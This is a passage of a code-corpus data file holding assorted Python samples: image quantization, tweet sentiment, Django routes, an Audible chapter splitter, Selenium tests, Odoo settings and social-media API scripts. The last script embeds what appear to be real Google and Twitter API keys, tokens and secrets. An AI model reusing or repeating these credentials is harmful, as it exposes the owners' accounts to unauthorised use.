right)\r\ndef rotate(arr,num,d):\r\n if d == 0:\r\n shift = num % len(arr)\r\n arry = arr[shift:] + arr[:shift]\r\n return arry\r\n elif d == 1:\r\n LS = len(arr) - (num % len(arr))\r\n RS = num % len(arr)\r\n arry = arr[::-1][:RS] + arr[:LS] \r\n return arry\r\n\r\nprint(f'{arry}\\n{rotate(arry,4,1)}')\r\n\r\n\r\n\r\n\r\n","sub_path":"General examples/rotate_list.py","file_name":"rotate_list.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"604669045","text":"# Write a computer program capable of reducing the number of intensity levels \r\n# in an image from 256 to 2, in integer powers of 2. The desired number of \r\n# intensity levels needs to be a variable input to your program.\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport math # for math.floor\r\n\r\nNUM_LEVEL = 8\r\nd = 256/NUM_LEVEL # Divisor\r\n\r\n# Read image \r\nimg = cv2.imread(\"lenna.png\", cv2.IMREAD_GRAYSCALE) # (512, 512, 3)\r\n\r\n# Access pixels\r\nfor i in range(img.shape[0]):\r\n for j in range(img.shape[1]):\r\n img[i, j] = math.floor(img[i, j] / d) * d # Quantization\r\n\r\n# Show image\r\ncv2.imshow(\"lenna\", img)\r\ncv2.waitKey(0)\r\n","sub_path":"w1/quantization.py","file_name":"quantization.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"451710399","text":"import json\nimport os\nimport re\nimport nltk\nimport csv\n\n\n\nusers = {}\ndict_time_series = {}\njsons_path = \"/home/student/CS_123_project/jsons_dir\"\nbug_dict = {}\n\nWORD_RE = re.compile(r\"[\\w']+\")\n\nnltk.download('stopwords')\nnltk.download('vader_lexicon')\nfrom nltk.corpus import stopwords\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nstop_words=set(stopwords.words(\"english\"))\n\ndef user_time_series():\n\n total_line_count = 0\n geotag_count = 0\n geotag_list = []\n for filename in os.listdir(jsons_path):\n print(filename)\n file_path = jsons_path + \"/\" + filename\n\n with open(file_path) as test_json:\n \n # try:\n lines = test_json.readlines()\n num_lines = len(lines)\n total_line_count += num_lines\n\n for i in range(num_lines):\n line = json.loads(lines[i])\n # total_line_count += 1\n # for l in lines:\n # l = json.loads(l)\n\n # if 'geo' in l:\n\n # if l['geo'] != None:\n # print('geo : {}'.format(l['geo']))\n\n for item in line:\n # print('{} : {} \\n'.format(item, line[item]))\n # print(item)\n\n ## We're going to ignore deleted tweets because it has no data\n if item == 'delete':\n total_line_count -= 1\n continue\n if item == 'user':\n\n ## 'users' is another dictionary\n for item2 in line[item]:\n # print('{} : {} \\n'.format(item2, line[item][item2]))\n identification = line[item]['id']\n user_location = line[item]['location']\n statuses_count = line[item]['statuses_count']\n followers_count = line[item]['followers_count']\n favorites_count = line[item]['favourites_count']\n # print(users)\n\n users[identification] = users.get(identification, 0) + 1\n\n time_stamp = line['created_at']\n place = line['place']\n tweet_id = line['id']\n tweet_text = line['text']\n\n geo = line['geo']\n if line['geo'] != None:\n # write_to_json(\"repeat_tweets.json\", {identification: tweet_text})\n write_csv([tweet_text, tweet_id], \"repeat_tweets.csv\")\n geotag_count += 1\n geotag_list.append(line['geo'])\n\n ## Sentiment Analysis for non empty geos (not the USA)\n filtered = ''\n for word in WORD_RE.findall(tweet_text):\n if word not in stop_words:\n if filtered:\n filtered += ' '\n filtered += str(word)\n # print(filtered)\n sentiment = SentimentIntensityAnalyzer().polarity_scores(filtered)['compound']\n # if identification == 889963667520925698 or identification == \"889963667520925698\":\n # print(\"random user filtered val: \")\n # print(filtered)\n if identification not in dict_time_series:\n dict_time_series[identification] = [[],[]]\n \n dict_time_series[identification][0].append(sentiment)\n dict_time_series[identification][1].append(filtered)\n\n\n\n '''\n DO USER SENTIMENT analysis\n Compare geography?\n // can do a lat long shape to google map to visualize where we are\n // have to do in US\n\n make time series\n\n \n '''\n\n # except Exception as e:\n # print('here is excepton:')\n # print(e)\n # print('\\n')\n # print(\"file name is\" + filename)\n # print('here is the json line:\\n')\n # print(line)\n # print(users)\n # print('\\n')\n\n # for user in users:\n # if users[user] > 2:\n # print(user, users[user])\n\n print(\"total lines: \", total_line_count)\n print(\"total geotags: \", geotag_count)\n # print(geotag_list)\n\n\n # print(dict_time_series.keys())\n print('users comparison\\n')\n print(len(dict_time_series))\n print(len(users))\n print(\"\\n\")\n res = 0\n for useri in dict_time_series:\n print(useri,\":\", dict_time_series[useri])\n print(\"\\n\")\n\n\n\ndef write_to_json(filename, data):\n with open(filename, \"a\") as json_file:\n json.dump(data, json_file)\n\ndef write_csv(given_list, filename):\n '''\n Takes a list and creates a csv line of that list or appends a new line\n to an already existing csv file\n\n Inputs:\n given_list (list)\n filename (str): file to store csv\n\n Returns:\n None\n '''\n with open(filename, \"a\") as outfile:\n writer = csv.writer(outfile, delimiter=\"|\")\n writer.writerow(given_list)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"145658449","text":"from django.urls import path\nfrom django.conf.urls import url\nfrom first import views\n\n\napp_name = 'first'\n\nurlpatterns = [\n\n path('formviaturas/$', views.form_viaturas_view, name='form_viaturas'),\n path('formservicos/$', views.form_servicos_view, name='form_servicos'),\n path('formparagens/$', views.form_paragens_view, name='form_paragens'),\n\n path('paragens/$', views.ParagensView.as_view(), name='paragens'),\n path('viaturas/$', views.ViaturasView.as_view(), name='viaturas'),\n path('servicos/$', views.servicos, name='servicos'),\n path('pesagens/$', views.pesagens, name='pesagens'),\n\n url(r'^viaturas/(?P[-\\w]+)/$', views.ViaturasDetailView.as_view(), name='viaturas_detail'),\n url(r'^viaturas_create/$', views.ViaturaCreateView.as_view(), name='viaturas_create'),\n url(r'^viaturas_update/(?P[-\\w]+)/$', views.ViaturaUpdateView.as_view(), name='viaturas_update'),\n]\n","sub_path":"first/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"343334996","text":"\n# -*- coding: utf-8 -*-\n__version__ = \"0.02\"\n\n\"\"\"\nSource : https://github.com/izneo-get/audible-tools\n\"\"\"\n\nimport requests\nimport sys\nimport time \nimport re\n\n\nif len(sys.argv) < 2:\n print(\"Usage: \")\n print(sys.argv[0] + \" [FILE_IN [\\\"ffmpeg options\\\" [OUTPUT_EXT]]]\")\n print()\n print(\"Examples:\")\n print(sys.argv[0] + \" B00TKSFFJE\")\n print(sys.argv[0] + \" \\\"https://stories.audible.com/audibleapi/1.0/content/B00TKSFFJE/metadata?drm_type=Hls&response_groups=chapter_info\\\"\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4 \\\"-b:a 64k -c:a mp3\\\" mp3\")\n exit()\n\nchapters_url = sys.argv[1]\n\nfile_in = \"file_in.mp4\"\nif len(sys.argv) > 2:\n file_in = sys.argv[2]\nfile_ext = file_in.split('.')[-1]\n\nffmpeg_option = \"-c copy\"\nif len(sys.argv) > 3:\n ffmpeg_option = sys.argv[3]\nif len(sys.argv) > 4:\n file_ext = sys.argv[4]\n\nif re.fullmatch(r\"[\\w]+\", chapters_url):\n chapters_url = f\"https://stories.audible.com/audibleapi/1.0/content/{chapters_url}/metadata?drm_type=Hls&response_groups=chapter_info\"\n\nresp = requests.get(chapters_url)\ncontent = resp.json()\nchapters = content['content_metadata']['chapter_info']['chapters']\n\n\n\n\nfor i, chapter in enumerate(chapters):\n start_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['start_offset_ms'] / 1000))) + '.' + f\"{(chapter['start_offset_ms'] % 1000):03d}\"\n length_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['length_ms'] / 1000))) + '.' + f\"{(chapter['length_ms'] % 1000):03d}\"\n filename = f\"{i:03d} {chapter['title']}.{file_ext}\"\n filename = re.sub(r\"[^\\w\\-_\\. ']\", '_', filename)\n print(f\"ffmpeg -i \\\"{file_in}\\\" -ss {start_ms} -t {length_ms} {ffmpeg_option} \\\"{filename}\\\" && ^\")\n\nprint(\"echo Done!\")","sub_path":"split_audible.py","file_name":"split_audible.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"231397684","text":"\nimport numpy as np\nimport time\n \nclass Board():\n def __init__(self, bits, depth = 0, max_depth = 3, board_size = (20, 10)):\n self.bits = bits\n if depth == 0: \n self.score = 0\n else: \n self.score = self.calculateScore()\n self.depth = depth \n self.children = []\n self.max_depth = max_depth\n self.board_size = board_size\n \n def generateBoard(self, shape):\n children = []\n if self.depth < self.max_depth: \n if shape == \"I\": \n #vertical \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0] \n for num, i in enumerate(highests * (highests > 3)): \n if i > 0:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[range(i-4,i), num] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n # horizontal \n for i in range(self.board_size[1] - 3):\n if np.all(highests[range(i,i+4)] > 0):\n num = min(highests[range(i,i+4)]) - 1\n if np.all(highests[range(i,i+4)] == highests[i]):\n mask = np.zeros(self.board_size, dtype=bool)\n mask[num, range(i,i+4)] = True \n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n if shape == \"O\": \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0]\n doesNotTouchCeiling = (highests * (highests > 1))\n for num, (i, j) in enumerate(zip(doesNotTouchCeiling[:-1], doesNotTouchCeiling[1:])):\n if i > 0 and j > 0: \n ind = min(highests[range(num, num + 2)]) - 1\n if highests[num] == highests[num+1]:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[ind-1, num] = True\n mask[ind, num] = True\n mask[ind-1, num+1] = True\n mask[ind, num+1] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b) \n return(children) \n def __str__(self):\n outstr = \"\"\n for x in self.bits:\n for y in x:\n if y:\n outstr += \"o \"\n else: \n outstr += \". \"\n outstr += \"\\n\"\n return outstr \n\n def countChildren(self, num = 0):\n for x in self.children:\n num = x.countChildren(num)\n return num + len(self.children) \n\n def countChildren(self, num = 0):\n for x in self.children:\n num = x.countChildren(num)\n return num + len(self.children) \n \n def printTerminalNodes(self):\n for x in self.children:\n x.printTerminalNodes()\n if not x.children:\n print(x)\n \n def calculateScore(self):\n return(np.min(np.where(self.bits)[0]), getLongestLowest(self.bits))\n \n\nn = 100\nboard_size = (20, 10)\na = Board(np.zeros(board_size, dtype=bool), 0, 5, board_size)\nchildren = []\nchildren.extend(a.generateBoard(\"O\")[:n])\nchildren.extend(a.generateBoard(\"I\")[:n])\na.children = children\na.children.sort(key=lambda s: s.score, reverse=True)\nfor x in a.children: \n children = []\n children.extend(x.generateBoard(\"O\")[:n])\n children.extend(x.generateBoard(\"I\")[:n])\n x.children = children\n x.children.sort(key=lambda s: s.score, reverse=True)\n for y in x.children:\n children = []\n children.extend(y.generateBoard(\"O\")[:n])\n children.extend(y.generateBoard(\"I\")[:n])\n y.children = children\n y.children.sort(key=lambda s: s.score, reverse=True)\n for z in y.children:\n children = []\n children.extend(z.generateBoard(\"O\")[:n])\n children.extend(z.generateBoard(\"I\")[:n])\n z.children = children\n z.children.sort(key=lambda s: s.score, reverse=True)\n \na.countChildren()\n\n\nprint(z)\n\ndef getLongestLowest(bits):\n horizontal_length = bits.shape[1]\n lowest = np.max(np.where(bits)[0])\n tot = np.sum(np.all(bits,1)) * horizontal_length\n for n1 in range(horizontal_length): \n if not bits[lowest][n1]:\n c = 1 \n for n2 in range(n1+1, horizontal_length):\n c += 1\n if bits[lowest][n2]:\n break\n tot = max(c, tot) \n return(tot) \n","sub_path":"Tetris/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"192546291","text":"from nider.core import Font\nfrom nider.core import Outline\nfrom nider.models import Content\nfrom nider.models import Linkback\nfrom nider.models import Paragraph\nfrom nider.models import Image\nimport json\n\nf = open(\"quotes.json\", \"r\")\nFile_json = json.load(f, encoding='ISO 8859-1')\nroboto_font_folder = '/home/ziad/Desktop/Console_Posts/Posts/'\ntext_outline = Outline(2, '#121212')\n\ndef img_to_txt(txt,author,result):\n para = Paragraph(text=txt,\n font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n text_width=30,\n align='center',\n color='#ededed',\n outline=text_outline\n )\n linkback = Linkback(text=author,\n font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n color='#ededed',\n outline=text_outline\n )\n content = Content(paragraph=para, linkback=linkback)\n img = Image(content,\n fullpath=result,\n width=3000,\n height=2005\n )\n img.draw_on_image('bg.png')\ndef quote_Text(counter):\n global File_json\n quoteText = File_json[counter]['quoteText']\n return quoteText\ndef quote_Author(counter):\n global File_json\n quoteAuthor = \"-\" + File_json[counter]['quoteAuthor'] \n return quoteAuthor\nfor counter in range(550):\n result = str(counter) + \".png\"\n img_to_txt(quote_Text(counter),quote_Author(counter),result)\n","sub_path":"img_return.py","file_name":"img_return.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"72745364","text":"from .base import FunctionalTest\nfrom .list_page import ListPage\nfrom .my_lists_page import MyListsPage\n\ndef quit_if_possible(browser):\n #try: browser.quit()\n #except: pass\n browser.quit()\n\nclass SharingTest(FunctionalTest):\n def test_can_share_a_list_with_another_user_pt1(self):\n list_page = ListPage(self)\n \n # Edith is a logged-in user\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the home page and starts a list\n self.browser.get(self.live_server_url)\n \n list_page.add_list_item('Get help')\n \n # She notices a \"Share this list\" option\n share_box = list_page.get_share_box()\n \n # and notices that the placeholder \"your-friend@example.com\" is present\n self.assertEqual(\n share_box.get_attribute('placeholder'),\n 'your-friend@example.com'\n )\n \n # She shares her list by entering the email address of a friend\n # The page updates to say that it's shared with Oniciferous:\n list_page.share_list_with('oniciferous@example.com')\n\n\n ## note - in order for this to work, all 3 parts need to be made part of the same test. Because otherwise, the temporary database used is destroyed between tests, creating a false error\n #def test_can_share_a_list_with_another_user_pt2(self):\n # list_page = ListPage(self)\n\n # Ediths friend Oniciferous is also hanging out on the lists site as a logged in user\n self.create_pre_authenticated_session('oniciferous@example.com')\n\n # Oniciferous goes to the lists page with his browser\n MyListsPage(self).go_to_my_lists_page()\n\n # He sees Edith's list in there!\n self.browser.find_element_by_link_text('Get help').click()\n\n # On the list page, Oniciferous can see says that it's Edith's list\n self.wait_for(lambda: self.assertIn(\n 'edith@example.com',\n list_page.get_list_owner()\n ))\n\n # He adds an item to the list\n list_page.add_list_item('Hi Edith!')\n\n #def test_can_share_a_list_with_another_user_pt3(self):\n # list_page = ListPage(self)\n\n # When Edith refreshes the page, she sees Oniciferous's addition\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the lists page in her browser\n MyListsPage(self).go_to_my_lists_page()\n\n # She clicks on the list that she created earlier\n self.browser.find_element_by_link_text('Get help').click()\n\n # And finds that Oniciferous has added something to her list\n list_page.wait_for_row_in_list_table('Hi Edith!', 2)\n \n \n ","sub_path":"functional_tests/test_sharing.py","file_name":"test_sharing.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2636082","text":"# -*- coding: utf-8 -*-\n###################################################################################\n#\n# Copyright (C) 2020 Odox SoftHub LLP()\n# Author: Albin Mathew()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n###################################################################################\n\nfrom odoo import api, fields, models\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n commission_account_id = fields.Many2one(comodel_name='account.account', string=\"Commission Account\")\n discount_account_id = fields.Many2one(comodel_name='account.account', string=\"Discount Account\")\n bank_fee_account_id = fields.Many2one(comodel_name='account.account', string=\"Bank Fee Account\")\n currency_diff_account_id = fields.Many2one(comodel_name='account.account', string=\"Currency Diff Account\")\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo()\n res.update(\n commission_account_id=int(params.get_param('odx_sale_purchase_customization.commission_account_id')),\n\n )\n res.update(\n discount_account_id=int(params.get_param('odx_sale_purchase_customization.discount_account_id')),\n\n )\n res.update(\n bank_fee_account_id=int(params.get_param('odx_sale_purchase_customization.bank_fee_account_id')),\n\n )\n res.update(\n currency_diff_account_id=int(params.get_param('odx_sale_purchase_customization.currency_diff_account_id')),\n\n )\n\n return res\n\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.commission_account_id\",\n self.commission_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.discount_account_id\",\n self.discount_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.bank_fee_account_id\",\n self.bank_fee_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.currency_diff_account_id\",\n self.currency_diff_account_id.id)\n\n\n\n","sub_path":"odx_sale_purchase_customization/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"345334325","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 30 18:51:15 2018\n\n@author: brihat\n\"\"\"\n\n#import nltk\n#nltk.download('stopwords')\n#nltk.download('punkt')\nfrom nltk.corpus import stopwords\n\nfrom sklearn.model_selection import train_test_split\n#from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import SGDClassifier\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import numpy as np\n\nclass MovieReviews:\n \n def readText(filename):\n DF = pd.read_csv(filename, sep = \"\\n\", header = None)\n DF.columns = ['Reviews']\n return DF\n \n \n def splitDataframe(pandasDataFrame):\n train, test = train_test_split(pandasDataFrame, test_size = 0.15)\n return train, test\n \n def mergeDataFrame(pandasDataFrame1, pandasDataFrame2, pos, neg):\n DF1 = pandasDataFrame1.assign(label = pos)\n DF2 = pandasDataFrame2.assign(label = neg)\n df_new = pd.concat([DF1, DF2])\n return df_new\n \n def usePipeline(pandasDataFrame):\n stop = set(stopwords.words('english'))\n text_clf = Pipeline([('vect', TfidfVectorizer(ngram_range = (1, 2), min_df = 2, stop_words = stop)),\n ('clf', SGDClassifier()),])\n\n return text_clf\n \n \n def fitTrainData(text_clf, pandasDataFrame):\n text_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n return text_clf\n \n def predictionWithAccuracy(text_clf, pandasDataFrame):\n predicted = text_clf.predict(pandasDataFrame.Reviews)\n #accuracy = np.mean(predicted == pandasDataFrame.label)\n return predicted\n \n def getMetrics(gs_clf, pandasDataFrame):\n target_names = ['PR', 'NR']\n predictionList = gs_clf.predict(pandasDataFrame.Reviews)\n result = metrics.classification_report(pandasDataFrame.label, predictionList, target_names = target_names)\n return result, predictionList\n \n def getConfusionMatrix(pandasDataFrame, predictionList):\n conf_matrix = metrics.confusion_matrix(pandasDataFrame.label, predictionList)\n return conf_matrix\n \n def useGridSearch(text_clf, pandasDataFrame):\n C = [0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]\n param_grid = [{'clf__alpha': C, 'clf__loss': ['hinge', 'squared_hinge', 'log'], 'clf__max_iter': [100]}]\n gs_clf = GridSearchCV(text_clf, param_grid = param_grid, cv = 10, n_jobs = -1)\n gs_clf = gs_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n best_score = gs_clf.best_score_\n best_param = gs_clf.best_params_\n return gs_clf, best_score, best_param\n \n def getROCCurve(gs_clf, pandasDataFrame):\n score_roc = gs_clf.decision_function(pandasDataFrame.Reviews)\n fpr, tpr, thresholds = metrics.roc_curve(pandasDataFrame.label, score_roc)\n roc_auc = metrics.auc(fpr, tpr)\n plt.title('Receiver Operating Characteristic')\n plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.plot([0,1], [0, 1], 'r--')\n plt.show()\n \nif __name__ == '__main__':\n RD = MovieReviews\n posReviewDF = RD.readText(\"rt-polarity.pos\")\n negReviewDF = RD.readText(\"rt-polarity.neg\")\n #print (negReviewDF) \n #posReviewDF1 = RD.removeStopwords(posReviewDF)\n #negReviewDF1 = RD.removeStopwords(negReviewDF)\n #print(posReviewDF1)\n posReviewDFTrain, posReviewDFTest = RD.splitDataframe(posReviewDF)\n negReviewDFTrain, negReviewDFTest = RD.splitDataframe(negReviewDF)\n #print(negReviewDFTrain) \n reviewTrainDF = RD.mergeDataFrame(posReviewDFTrain, negReviewDFTrain, 1, 0)\n reviewTestDF = RD.mergeDataFrame(posReviewDFTest, negReviewDFTest, 1, 0)\n print(negReviewDFTest)\n print(posReviewDFTest)\n print(posReviewDFTest.shape, negReviewDFTest.shape)\n print(reviewTestDF.shape)\n text_clf = RD.usePipeline(reviewTrainDF) \n gs_clf, best_score, best_param = RD.useGridSearch(text_clf, reviewTrainDF)\n print(\"best_score: \")\n print(best_score)\n print(\"Best Parameter: \")\n print(best_param)\n MetricsF1Scores, predictionList = RD.getMetrics(gs_clf, reviewTestDF)\n print(\"Metrics: \")\n print(MetricsF1Scores)\n conf_matrix = RD.getConfusionMatrix(reviewTestDF, predictionList)\n print(\"Confusion Matrix :\")\n print(conf_matrix)\n \n RD.getROCCurve(gs_clf, reviewTestDF)\n \n ","sub_path":"src/MovieReviewSGDclassifier.py","file_name":"MovieReviewSGDclassifier.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"607823293","text":"import unittest\nfrom torch.autograd import gradcheck\nfrom quantize import *\n\nclass TestQuantize(unittest.TestCase):\n def test_softmin_back(self):\n x = (torch.rand(20, 10, dtype=torch.double, requires_grad=True),)\n self.assertTrue(gradcheck(softmin, x))\n\n def test_quantize(self):\n x = 2*torch.rand((100, 100), dtype=torch.double) - 1\n centers = 2*torch.arange(200, dtype=torch.double)*1/200 - 1\n qx = quantize(x, centers, 0.1)\n ax = (x * 100).round() / 100\n print(x)\n print(qx)\n self.assertTrue(torch.mean(torch.abs(qx - ax)) < 1/400)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_quantize.py","file_name":"test_quantize.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230091423","text":"\"\"\"\nnaming conventions\nclass names = camelCase\nnormal variables and functions = names_with_underscore\nglobal variables = CAPITAL\nglobal constant varibales = CAPITAL_CONST\n\"\"\"\n\nimport firebase_admin\nfrom firebase_admin import credentials\nimport connection\nimport threading\n\nFIREBASE_URL_CONST = \"\"\nPRIVATE_KEY_PATH = \"\"\n\ndef thread():\n t1 = threading.Thread(target=hardware.get_gps)\n t2 = threading.Thread(target=hardware.get_rfid)\n t3 = threading.Thread(target=hardware.get_camera)\n t1.start()\n t2.start()\n t3.start()\n\nif __name__ == \"__main__\":\n import sys\n\n cred = credentials.Certificate(PRIVATE_KEY_PATH)\n firebase_admin.initialize_app(cred, {\n 'databaseURL': FIREBASE_URL_CONST\n })\n\n hardware = connection.piHandler()\n thread()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115523582","text":"# Opus/UrbanSim urban simulation software.\r\n# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington\r\n# See opus_core/LICENSE \r\n\r\nfrom urbansim.abstract_variables.abstract_number_of_agents_with_same_attribute_value import abstract_number_of_agents_with_same_attribute_value\r\n\r\nclass same_sector_employment_in_zone(abstract_number_of_agents_with_same_attribute_value):\r\n \"\"\"\"\"\"\r\n \r\n agent_attribute_name = \"job.sector_id\"\r\n agent_dependencies = ['urbansim_parcel.job.zone_id']\r\n choice_set_dependencies = ['urbansim_parcel.building.zone_id']\r\n #unique_agent_attribute_value = range(1, 20)\r\n geography_dataset_name = 'zone'\r\n ## use default\r\n #expression_agents_of_attribute_by_geography = \"'agents_of_attribute_%(agent_attribute_value)s = %(geography_dataset_name)s.aggregate(%(agent_attribute_name)s==%(agent_attribute_value)s)'\"\r\n \r\n \r\nfrom opus_core.tests import opus_unittest\r\nfrom opus_core.tests.utils.variable_tester import VariableTester\r\nfrom numpy import arange, array\r\nfrom numpy import ma\r\nclass Tests(opus_unittest.OpusTestCase):\r\n \r\n def test_my_inputs(self):\r\n tester = VariableTester(\r\n __file__,\r\n package_order=['urbansim_parcel', 'urbansim', 'opus_core'],\r\n test_data={\r\n \"job\":{ \r\n 'job_id': array([1, 2, 3, 4, 5, 6]),\r\n 'building_id':array([1, 1, 5, 3, 3, 3]),\r\n 'sector_id': array([1, 1, 2, 1, 3, 3]),\r\n }, \r\n \"building\":{ \r\n 'building_id': array([1, 2, 3, 4, 5,]),\r\n 'zone_id': array([1, 2, 2, 3, 4,]),\r\n },\r\n 'zone':{\r\n 'zone_id': array([1,2,3,4]),\r\n },\r\n })\r\n ## mind the mirror of gridcells in waling_distance calculus\r\n should_be = array([[2, 1, 1, 0, 0], \r\n [2, 1, 1, 0, 0],\r\n [0, 0, 0, 0, 1],\r\n [2, 1, 1, 0, 0],\r\n [0, 2, 2, 0, 0],\r\n [0, 2, 2, 0, 0]])\r\n \r\n tester.test_is_close_for_variable_defined_by_this_module(self, should_be)\r\n\r\n\r\nif __name__=='__main__':\r\n opus_unittest.main()\r\n","sub_path":"urbansim_parcel/job_x_building/same_sector_employment_in_zone.py","file_name":"same_sector_employment_in_zone.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43748699","text":"import json\nimport requests\nimport sys\nimport datetime\nimport time\nimport pandas\nimport tweepy\nfrom TwitterAPI import TwitterAPI\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nsys.stdout.flush()\n\n\ndef instagram_api(keyword):\n url1 = 'https://www.instagram.com/web/search/topsearch/?query='\n url2 = keyword\n url = url1 + url2\n\n response = requests.get(url)\n response_data = response.json()\n\n # GET FOLLOWER COUNT & HASHTAG COUNT\n follower_count = response_data['users'][0]['user']['follower_count']\n hashtag_count = 0\n for hashtag in response_data['hashtags']:\n hashtag_count += hashtag['hashtag']['media_count']\n\n return(follower_count, hashtag_count)\n\n\ndef youtube_id_mapping(input_list):\n out_list = []\n for i in input_list:\n q = i\n key = \"AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U\"\n url = \"https://www.googleapis.com/youtube/v3/search?part=snippet&q=\" + q + \"&type=channel\" + \"&key=\" + key\n response = requests.get(url)\n response_data = response.json()\n out_list.append(response_data['items'][0]['id']['channelId'])\n\n return out_list\n\n\ndef youtube_api(user_id):\n key = 'AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U'\n url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&id=\" + user_id + \"&key=\" + key\n # User Name으로 접근하기\n #url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&forUsername=\"+name+\"&key=\"+key\n\n response = requests.get(url)\n response_data = response.json()\n\n out_data = response_data['items'][0]['statistics']\n return(int(out_data['viewCount']), int(out_data['commentCount']), int(out_data['subscriberCount']), int(out_data['videoCount']))\n\n\ndef twitter_api(keyword):\n # Consumner_key & Secret / Access_Token & Secret\n consumer_key = \"mq7ecRYTpx3OXcF6E5pCTGZTF\"\n consumer_secret = \"tRboVBFKrnxAXEjaNwwBRfWgZAqXowETSqKOtdSU4RNZUM9NSG\"\n\n access_token = \"991892597391081473-sXwXOYP253t85KWEBrqs3WPpOu7its4\"\n access_token_secret = \"pPiDRxsb5CZjdyZXZahzlFBl1xwfQ7hTTVxLJdKbA4xwd\"\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n\n # Get user's information -> follower count, favorite count, friends count, listed count\n user = api.search_users(keyword)\n user = user[0]\n return(user['followers_count'], user['favourites_count'], user['friends_count'], user['listed_count'])\n\n\n\n\n\n\n###############################################################\n# 